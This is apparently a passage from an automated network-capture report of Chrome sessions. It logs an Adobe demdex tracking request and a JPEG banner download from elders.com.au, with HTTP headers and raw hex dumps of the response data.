                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: c5 c1 98 60 0d f1 ae 2b d6 fd 8a dd 6e 27 b9 7d fc fa f8 79 cd b9 1e ce d7 14 be fe 1c 30 3c 63 71 96 8c 94 12 4b 16 a2 1c 6f 6d ce 06 2a 77 d2 c3 9d 74 85 10 10 93 a8 ca a5 64 30 17 25 c6 a6 9a 89 4b 10 62 6a a4 af 9f 57 6d 8e b4 29 93 76 fe a3 92 c7 44 98 52 42 ad 45 d4 a5 10 00 62 cd 13 94 5b 57 ed b3 54 75 b7 73 8d d0 73 d4 bc c1 29 45 cc 49 1c 02 a2 fe 5e 21 5d 51 c9 d5 84 18 27 04 55 b1 d8 e6 11 e4 3b 5b ec b1 32 42 a8 ea d4 c9 33 9d ab 86 3a d7 3d ce b6 0b 6e 76 3b ec f6 13 6e 6e 57 2c 53 c1 ed 1a 91 4a 44 29 a2 40 56 1e 95 d1 41 05 f9 2d a0 91 cc 46 ae e5 7f 42 24 45 10 79 f9 ec 31 fe fb 3f fb bd f8 eb 3f fc bf e1 8f fe f1 3f 89 6f f9 c7 bf f5 b7 7c fc 53 e3 b7 95 60 31 33 fe a7 ff e1 fb f1 bd ff e9 77 21 af fb 03 26 7e fc 3e f9 01 c7 74 bd fd de
                                                                                                                                    Data Ascii: `+n'}y0<cqKom*wtd0%KbjWm)vDRBEb[WTuss)EI^!]Q'U;[2B3:=nv;nnW,SJD)@VA-FB$Ey1???o|S`13w!&~>t
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 38 04 0f 9f 69 9f 27 f3 a9 3f 3b 22 d2 50 3c 77 f5 2f 98 b2 71 44 e0 07 47 71 54 97 8c fc f4 27 66 cf 4d 53 24 8a e4 aa 96 9c 35 2c 58 1a b9 b2 9f 1b 51 b7 64 69 66 30 97 76 ff a5 60 49 17 d1 b1 40 83 3b 59 32 d2 6a e7 65 63 12 6c e7 db 15 c2 f6 5c 95 30 d9 d8 b4 88 46 5c 03 d6 29 62 ca 13 a6 9c 31 cf 3a fe 6b 45 ad 13 d2 24 f6 a1 e5 07 da 18 51 2f 45 08 b6 f1 85 be 5e 19 a9 63 66 0d 45 ca b8 32 92 45 90 31 6d f7 80 18 40 d0 aa 41 5d 7f 82 de 0f 51 b0 92 2a 99 5d 49 b4 f5 cd 72 36 83 16 61 84 94 34 44 a8 ea 6b 23 6f 11 60 46 60 46 25 c9 8f e4 20 f9 9a 0b 57 a0 64 94 bc c7 34 df 88 08 31 ef b1 cc ab ae ab 15 fb 35 23 a5 80 b5 56 04 84 56 ac f0 c1 ae ef e1 fa 2f f7 c0 c8 69 77 9e 64 a6 69 81 8a be 8f d4 66 a6 20 85 6b ff fb 9f ff 6f f1 c5 bf fb 4b f8 8e ff
                                                                                                                                    Data Ascii: 8i'?;"P<w/qDGqT'fMS$5,XQdif0v`I@;Y2jecl\0F\)b1:kE$Q/E^cfE2E1m@A]Q*]Ir6a4Dk#o`F`F% Wd415#VV/iwdif koK
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 71 c5 f5 ab 9d 71 96 81 58 e9 18 52 85 a2 5a 48 46 17 98 56 90 40 bd 34 7e 0c 13 d4 b6 38 f5 85 4e f2 39 02 42 ec a1 6a 73 ca 52 ea 15 82 e6 14 1e ea 71 d4 fe cb 5c c0 55 95 b2 2a f3 bc 8c 04 1d b6 d8 a9 a3 68 6d 07 6c ce 00 cd 99 32 48 7b 01 0c cf 42 10 a3 2e 82 4c 4d 09 34 b5 a2 0d fd 81 44 f5 71 7c 44 aa 46 1b 70 e0 28 e0 28 14 2b 2f db 78 1d af a9 8d 37 ae 90 b8 7e ff 2c fd a9 2d a6 ac ed 3a 4a 5e a5 f5 ca 9a 51 f6 6b 23 59 b5 9a 7a 25 0e 66 6e 0e a7 11 a7 4e 1e 43 08 28 64 39 7b d4 3e 93 59 db cb 58 1e 17 7a 2e d5 b8 9e 10 a1 87 41 b9 a7 9c c8 fb 6c be 50 77 1a 43 45 2c 05 b9 24 a4 5c 30 a5 84 a5 68 e8 b2 2a 01 2e 15 71 4a 1a e1 88 da 36 87 0e 6c 86 9d e7 b1 43 14 34 4a d0 d4 b7 fe 66 04 92 04 76 0e 32 fe 8c 58 f4 b1 cf 4a 2c 30 18 a5 3e b6 60 df 61
                                                                                                                                    Data Ascii: qqXRZHFV@4~8N9BjsRq\U*hml2H{B.LM4Dq|DFp((+/x7~,-:J^Qk#Yz%fnNC(d9{>YXz.AlPwCE,$\0h*.qJ6lC4Jfv2XJ,0>`a
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 98 36 9b 16 12 0c 29 49 d1 45 8a ad 7b 3b 0d b9 2e d6 50 94 b4 6a 4d ae 93 f4 11 31 4c 5e 3c 0e 37 1c 9c b7 55 90 0d bf 1f 49 ef c1 b5 8c 64 94 65 5e ca 78 94 66 89 5c 00 ce 05 01 3d 7f ee f2 ea 0a 29 46 ec f7 2b ce ce ce b0 bd 38 c3 cd f5 2b bc fb f6 3b 78 fe e4 09 f6 eb 0a 28 01 3a 3f 3f c3 d5 fd 07 78 f4 c6 43 5c 5d 5d 21 46 c2 ba bb 06 e7 0a 9a 66 c4 44 c0 bc c5 5b 9f f8 14 ce af ee e1 9d b7 df c7 97 bf fa 0e 6e 6f 56 30 43 f3 4f 4c 1d 2e 28 cc 60 92 5c ca cd ac 4a 6e 0c b8 bd dd 6b c2 bc f4 75 93 05 8c da 73 69 04 47 6d 45 24 c9 bb 0a b1 e7 58 c5 d8 bb b2 07 23 61 2d 3f ce ca f8 e5 5e d5 5a 11 34 e7 72 1c e3 c1 42 6d 10 52 c0 46 5c a0 4a ce d0 17 2a 90 8d cf de 2f cf c8 d2 48 84 ac 3d 87 fd 3d aa 28 7f 1c 48 5a 87 0c d5 73 23 a1 b2 9d 10 c6 63 8f cf
                                                                                                                                    Data Ascii: 6)IE{;.PjM1L^<7UIde^xf\=)F+8+;x(:??xC\]]!FfD[noV0COL.(`\JnkusiGmE$X#a-?^Z4rBmRF\J*/H==(HZs#c
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 89 71 2d 05 b5 06 d9 7b 89 54 e6 25 99 38 46 4a aa 96 3b ab 29 68 06 51 06 7d c0 14 55 81 9a 12 b6 f3 84 ed 3c 61 33 27 6c e6 05 5b 6d bb f0 41 f9 15 96 d0 1a d3 a4 89 80 b2 f5 4b 4c d2 33 04 41 26 88 11 1c 80 b5 8a 4e 72 0b 6a 2d 9a a4 29 06 a3 93 21 0d 13 a2 e7 62 35 95 05 e8 79 06 7a ff 32 57 d9 ae 66 90 bd 45 cd ab 4d 4d 6a ba 53 60 94 18 90 d8 3a d1 13 50 8a 96 b6 6b c8 c2 a4 7c 04 54 94 a3 8e d2 a3 72 21 db 46 f0 b0 98 c1 fa 2d 0d f9 2e 80 24 b7 23 4a e8 31 a5 28 2a 1e 57 94 9c 41 41 92 93 2d 01 f7 58 59 19 c3 0c 21 04 e4 65 8b cd d9 16 cb b2 60 b7 db 1d 28 9d 07 9e 68 ad 20 2a 20 24 09 7d 26 5b 38 ab aa 9b 96 2b 04 18 4d 78 2d 59 5b 9f 03 0d 13 f8 4e 1c f1 2e 51 ab 0e af e1 ae d7 01 e9 57 93 62 44 5a 66 5c dc bb 87 f3 ab 7b 98 55 bd 32 e5 6a cc c1
                                                                                                                                    Data Ascii: q-{T%8FJ;)hQ}U<a3'l[mAKL3A&Nrj-)!b5yz2WfEMMjS`:Pk|Tr!F-.$#J1(*WAA-XY!e`(h * $}&[8+Mx-Y[N.QWbDZf\{U2j


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    145192.168.2.44993254.72.201.1564435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC519OUTGET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730793803403 HTTP/1.1
                                                                                                                                    Host: dpm.demdex.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: demdex=50828223440744139920245021373270661928
                                                                                                                                    2024-11-05 08:03:26 UTC712INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/json;charset=utf-8
                                                                                                                                    Content-Length: 370
                                                                                                                                    Connection: close
                                                                                                                                    X-TID: xT51RyXKRmg=
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                    Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                    P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                    DCS: dcs-prod-irl1-2-v067-0153aca79.edge-irl1.demdex.com 2 ms
                                                                                                                                    set-cookie: demdex=50828223440744139920245021373270661928; Max-Age=15552000; Expires=Sun, 04 May 2025 08:03:26 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                    2024-11-05 08:03:26 UTC370INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 35 35 37 34 34 36 32 37 35 32 31 38 35 38 38 32 38 38 35 30 36 32 37 30 36 36 39 34 30 35 37 37 30 30 36 39 38 31 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                    Data Ascii: {"d_mid":"55744627521858828850627066940577006981","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    146192.168.2.449938162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1204OUTGET /content/dam/eld/images/homepage-banners/staff_background_wheat.jpg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true
                                                                                                                                    2024-11-05 08:03:28 UTC744INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:28 GMT
                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                    Content-Length: 137787
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    Cf-Bgj: h2pri
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    content-disposition: attachment; filename="staff_background_wheat.jpg"; filename*=UTF-8''staff_background_wheat.jpg
                                                                                                                                    etag: "0x8DCBDC3609A69A7"
                                                                                                                                    last-modified: Fri, 16 Aug 2024 07:16:41 GMT
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-served-by: cache-dfw-kdfw8210175-DFW
                                                                                                                                    x-timer: S1726803116.375133,VS0,VS0,VE1413
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53cc9fef6c10-DFW
                                                                                                                                    2024-11-05 08:03:28 UTC625INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                    Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 44 33 44 41 35 33 46 39 35 33 42 44 31 31 45 46 42 31 35 36 41 39 44 44 38 35 33 35 42 37 34 37 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 39 64 37 36 31 61 63 2d 61 63 36 65 2d 34 65 63 64 2d 61 65 32 34 2d 65 62 38 65 34 37 32 65 35 64 35 63 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 65 63 30 36 63 34 63 2d 37 64 66 38 2d 65 61 34 63 2d 38 32 38
                                                                                                                                    Data Ascii: pMM:InstanceID="xmp.iid:D3DA53F953BD11EFB156A9DD8535B747" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69d761ac-ac6e-4ecd-ae24-eb8e472e5d5c" stRef:documentID="adobe:docid:photoshop:6ec06c4c-7df8-ea4c-828
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e
                                                                                                                                    Data Ascii: G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: d9 7d e8 7c 48 ff 00 cc b7 d9 3f f8 d7 ff 00 0e 79 6f fb 07 87 f1 bf 0b fd af dd 9f c2 bb fc 07 c5 99 fb ac 3f 4a 1f 12 07 ea 57 ec 99 f4 f3 5f fc 39 e5 9f ec 1e 1f c6 fc 2f f6 bf 76 7f 0a e7 f0 3f 14 fd 97 de 87 c4 bd ff 00 cc a7 d9 4f 5f f7 d3 ff 00 0e f9 67 fb 0b 87 f1 bf 0b fd af dd 9f c2 a4 7c 03 c5 86 75 7d f8 7c 4b df fc c9 fd 95 ff 00 8d 3f f0 ef 95 ff 00 b0 b8 7f 1c f0 bf da fd d9 fc 2a 3f c0 fc 53 f6 5f 7a 1f 12 f7 ff 00 32 5f 65 bf e3 3f fc 3b e5 7f ec 2e 73 f8 e7 85 e5 de fd d9 fc 2b a3 c0 7c 54 87 15 61 fa 50 f8 91 ff 00 99 2f b2 df f1 9f fe 1d f2 bf f6 17 0f e3 9e 17 fb 5f bb 3f 85 07 c0 7c 54 7f ba fb d0 f8 97 bf f9 90 fb 2f ff 00 19 ff 00 e1 df 2b ff 00 61 73 bf c6 fc 2f f6 bf 76 7f 0a e7 f0 2f 15 67 ee b0 fd 28 7c 4b df fc c8 7d 97 ff 00
                                                                                                                                    Data Ascii: }|H?yo?JW_9/v?O_g|u}|K?*?S_z2_e?;.s+|TaP/_?|T/+as/v/g(|K}
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 8f f3 ea 38 7e 2b f0 0f f1 1f 72 cf 81 1f 86 3c 73 f6 1f 7e bf 8d 1f f3 d7 ed 59 f4 f2 91 ff 00 ce 4f 22 ff 00 64 70 fc 57 e0 1f e2 3e e5 9f 02 3f 0c f8 e7 ec 3e fd 7f 1a 3f e7 a7 da bf f8 a7 fe e4 f2 2f f6 47 0f c5 7e 01 fe 23 ee 59 f0 20 7c b1 e3 87 2a 3e fd 7f 1a 3f e7 a7 da bf f8 a7 fe e4 f2 2f f6 47 38 7e 6c f9 7e 39 ee 3f bb b3 e0 5d fc 31 e3 8e dd c6 3f a7 5f c6 bd ff 00 9e 9f 6a ff 00 e2 9f fb 93 c8 bf d9 1c 07 cd bf 2f 1c b7 1f 72 cf 81 73 f0 c7 8e 7e c3 ef d7 f1 a3 fe 7a 7d ab ff 00 8a 7f ee 4f 23 ff 00 64 70 fc 5b f2 f7 f8 8f ee ed f8 11 f8 63 c7 3f 61 f7 eb f8 d1 ff 00 3c fe d6 7f c5 23 ff 00 9c be 45 fe c8 e7 3f 17 7c bd fe 23 fb bb 7e 05 df c2 fe 3a ed dc 7d fa fe 35 ef fc f2 fb 5a 7f fa 28 ff 00 b9 7c 8b fd 93 c3 f1 77 cb df e2 3f bb b7 e0
                                                                                                                                    Data Ascii: 8~+r<s~YO"dpW>?>?/G~#Y |*>?/G8~l~9?]1?_j/rs~z}O#dp[c?a<#E?|#~:}5Z(|w?
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 00 9f af e7 8c 67 fc dc ea 90 1c f2 0b 21 37 41 d7 a7 c3 d0 f5 fd b9 f4 e0 42 08 62 cb 31 31 3f 1c 7e 40 7e 1f 89 fc b9 59 18 b9 c9 0b 60 9b d7 f3 fe df ed f4 e4 38 95 28 c7 16 59 7b ff 00 9f 4f 5f 8e 3f e9 8e 0b a6 05 b0 cd 66 b6 0f af 77 fe cc 75 e7 18 29 18 86 65 97 d4 1e bd 7a 7e 47 3c 00 60 c8 11 0c 39 85 b1 6c 8c af f9 f9 13 0e 4b ac b6 0b 3d c4 80 46 3e 19 f8 e7 d3 fc bc 89 8b 0c 57 08 e6 b3 59 c1 f8 8f f2 75 fc 87 38 cd 9a 19 87 4a cf ea 31 f1 e9 81 d7 38 e0 a3 a5 1f 51 f8 7a 7e 3d 7a fa 63 1f 80 e5 53 8f 20 a4 81 37 e7 d4 e7 fe 9e bd 3a f2 38 37 4a ea cc 4e 3a e4 e3 d7 e3 9c fe 5c 91 81 01 d0 bd 13 e7 fc 5d 7d 7e 19 3f fa f3 c8 80 4e 4a 5a 4b 3a 3e a0 75 1e 9d 47 fd 3f b7 9d 66 cd 4a 20 b3 94 0b 1d 33 e9 90 3e 1f 1f c4 72 12 89 90 21 4b 4e 2e 73
                                                                                                                                    Data Ascii: g!7ABb11?~@~Y`8(Y{O_?fwu)ez~G<`9lK=F>WYu8J18Qz~=zcS 7:87JN:\]}~?NJZK:>uG?fJ 3>r!KN.s
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 1a 01 2e 32 56 02 e3 05 90 9c 01 ea 3f f6 75 c7 4f 43 c3 bb 0b ab 67 d4 0c f5 6f ec fe ce 9d 3f 1c f0 30 1c 10 ea 31 fb ab f7 87 c4 3e d0 f8 dd bf 24 f2 cd 9d 6d 7d 2a b1 34 f2 cb 66 51 1c 71 c4 80 96 77 62 7a 0f c3 90 97 66 5a 78 9c 93 5b 5d ac b7 53 d1 1c f8 74 a8 87 ec 07 eb 0f ed 67 ea 19 6e cb e0 3b fd 7e e6 b5 3b 52 53 9a 6a 93 2e 63 96 3e 84 b2 12 ae 11 bd 54 e3 04 75 1c 88 85 da 75 d9 5c e1 11 fd 20 46 6b 57 7d e0 1b bd 9d 31 ba 51 26 12 0e 24 31 8b 75 f3 7c 15 b2 16 01 1f 29 c8 3d 72 0e 47 ed e9 8c f3 ab 07 ad 6d 16 7d 01 39 eb fd b9 c7 e7 f0 e4 0c 18 64 b9 82 cb ea 87 ed 03 e3 fd ff 00 9f 38 20 5b 14 00 bd fa 91 d3 04 7e 78 f8 75 ff 00 26 79 1d 2c 54 a0 31 75 ef d4 8f fd 59 cf ec 3f e5 e7 5b 1e 95 26 08 fa 91 9c 77 0f 5f ed ff 00 a6 78 08 36 58
                                                                                                                                    Data Ascii: .2V?uOCgo?01>$m}*4fQqwbzfZx[]Stgn;~;RSj.c>Tuu\ FkW}1Q&$1u|)=rGm}9d8 [~xu&y,T1uY?[&w_x6X
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 4f 35 02 46 63 35 b1 6c 75 5e b9 3e 9d 4e 71 eb f9 72 32 8e 1f ec a9 39 70 78 95 bf ea 07 51 dd d3 d7 a1 f8 74 e4 18 64 ca cc 33 5e 8b 00 81 92 3a fc 4f fd 07 4e 44 c0 64 80 5f 10 b6 7b f9 ea 3f bb 3d 7e 00 f5 e7 34 60 a4 08 7c 72 5e fb f8 f8 f5 cf 4c 7e cc f0 15 45 99 47 56 2b 62 d8 f4 f9 bd 7d 7a f5 fe df fa 67 9c ee c7 0c 97 5d 67 f5 07 19 ce 3e 18 f5 fc 4e 72 7d 4f 3a 6a 04 31 43 95 98 b1 f9 fa 7e 7e a7 ff 00 6f 28 ee fa d7 5d 6c 16 33 d7 bb af e1 9e bf fa 09 3c e9 af 07 e2 81 86 4b 60 b3 8f 53 9e b9 3f e5 f8 fa 67 1c e7 74 ec d9 ae 89 32 c8 59 f4 39 1d 7d 41 eb fd a7 f6 72 06 a3 d0 bb ab d0 b3 5b 1f fa fa e4 63 fb 47 20 2a 63 96 2b a2 4e 59 7c 76 fe b1 1a 8b 5b ef b1 3b 1a 34 76 16 22 9a 68 6b c9 25 5a b3 7b 4f 20 86 65 93 da 7c 30 3d 92 76 e1 81 e8
                                                                                                                                    Data Ascii: O5Fc5lu^>Nqr29pxQtd3^:ONDd_{?=~4`|r^L~EGV+b}zg]g>Nr}O:j1C~~o(]l3<K`S?gt2Y9}Ar[cG *c+NY|v[;4v"hk%Z{O e|0=v
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 0f 93 b2 cb dd 3f 88 f4 f8 7f 9b f0 1d 79 dd 04 07 56 cc b6 03 26 59 7b df 1c fe df cb a7 f7 f2 20 13 96 4a 0f 11 0d 3c 4a cc 4d e8 41 cf c7 f2 fd b8 fc f8 74 23 54 87 64 af 7d dc 63 e3 f8 9c fa fe 7f 8f a8 e0 ad 10 01 df 32 b2 12 fa 10 7f 0c 83 fb 3a 63 f2 3c e3 0f 32 eb 08 85 b5 67 19 07 3e 83 fb ff 00 67 43 e9 ca a5 5b 7b ab ac b3 13 fe 78 07 1f fb 01 e0 2a e6 50 cb d1 39 c9 cf a1 f5 e9 f8 fe 20 fc 40 e4 8d 43 4f 67 35 3d 23 47 4b ac bd ee 99 c9 fd a7 af e5 d0 7a 1e 56 21 22 59 41 02 7c f4 ce 3f cd 9f 8f 53 e9 ce f7 72 40 1c f2 59 fb e3 1e a3 a7 a7 af f9 bd 79 cd 32 76 28 65 98 9b a0 eb 8f cf 3f 1f 4c fe 63 91 38 12 38 a3 da a3 eb 2f b0 a5 f7 2b 5b 3a c8 bf ca 76 fa 09 ab cc 85 f0 56 fd 67 ee 46 58 ff 00 75 bb 97 d7 e3 c5 a5 12 2e 12 07 b2 42 bc 1d 7b
                                                                                                                                    Data Ascii: ?yV&Y{ J<JMAt#Td}c2:c<2g>gC[{x*P9 @COg5=#GKzV!"YA|?Sr@Yy2v(e?Lc88/+[:vVgFXu.B{
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: cb 1f ab 39 fc bf cb f8 e7 fb b9 29 d6 19 73 56 00 fa 56 42 d9 f9 4f e3 fd 87 f3 f4 f4 c0 e4 05 6c 71 c9 1a 97 bf 58 4f f7 f4 f5 e9 8f ed e4 45 67 8a e9 93 75 af ba bc fd d9 7e 04 8e 08 51 3f df ab 30 d3 fb 1b f7 9e e5 89 04 55 ea 7d a7 fb 8b 66 79 58 80 b1 c3 07 88 6e 25 96 46 27 a0 08 8a 49 fd 9c aa ef ec 67 fa 27 d8 99 d9 96 dd d4 7f f9 91 fe b0 5f cd dd af 23 d5 53 d7 b6 ce 6b b1 7d 1a a2 b9 9d 64 52 a5 58 64 75 f8 05 07 3c c1 11 8e 92 42 f7 e3 59 1d 2d e4 ff 00 4a ce 87 91 ea 76 35 45 ba b7 e0 96 16 ff 00 1a c8 bd 07 c3 a1 27 3d c3 91 d2 f1 70 ba fa bd d6 21 28 4b b6 a3 5e 13 3c f6 e1 86 0e d0 7b e4 75 00 80 7d 01 3d 58 f5 e7 3b b9 3e 4a 41 c8 ec 85 cd 0f 92 69 66 85 a6 8b 69 4d a3 52 03 66 51 d3 3d 31 80 72 3f 3e 46 40 1c 38 2e 0d 5c 42 e9 af e4 1a
                                                                                                                                    Data Ascii: 9)sVVBOlqXOEgu~Q?0U}fyXn%F'Ig'_#Sk}dRXdu<BY-Jv5E'=p!(K^<{u}=X;>JAifiMRfQ=1r?>F@8.\B


